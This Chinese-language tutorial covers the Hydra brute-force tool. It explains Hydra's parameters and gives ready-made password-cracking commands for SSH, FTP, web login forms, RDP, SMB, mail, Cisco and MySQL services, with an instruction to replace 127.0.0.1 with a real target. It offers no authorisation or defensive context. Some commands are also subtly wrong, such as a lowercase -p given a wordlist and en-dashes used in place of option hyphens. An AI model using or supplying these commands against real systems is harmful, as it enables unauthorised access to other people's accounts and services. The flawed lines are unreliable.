爆破工具--Hydra
参数说明
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名
以下均以目标IP为127.0.0.1举例,实际运用中替换为实际目标IP即可。
1、破解ssh:
1 | hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns 127.0.0.1 ssh |
示例如下:
破解成功账号密码会回显出来。
其他常用服务和协议例子:
2、破解ftp:
1 | hydra 127.0.0.1 ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV |
3、get方式提交,破解web登录:
1 | hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns 127.0.0.1 http-get /admin/ |
4、post方式提交,破解web登录:
1 | hydra -l 用户名 -P 密码字典 -s 80 127.0.0.1 http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" |
5、破解https:
1 | hydra -m /index.php -l muts -P pass.txt 127.0.0.1 https |
6、破解teamspeak:
1 | hydra -l 用户名 -P 密码字典 -s 端口号 -vV 127.0.0.1 teamspeak |
7、破解cisco:
1 | hydra -P pass.txt 127.0.0.1 cisco |
8、破解smb:
1 | hydra -l administrator -P pass.txt 127.0.0.1 smb |
9、破解pop3:
1 | hydra -l muts -P pass.txt my.pop3.mail pop3 |
10、破解rdp:
1 | hydra 127.0.0.1 rdp -l administrator -P pass.txt -V |
11、破解http-proxy:
1 | hydra -l admin -P pass.txt http-proxy://127.0.0.1 |
12、破解imap:
1 | hydra -L user.txt -p secret 127.0.0.1 imap PLAIN |
13、破解msql
1 | hydra -l root –p pass.txt –e ns 127.0.0.1 mysql |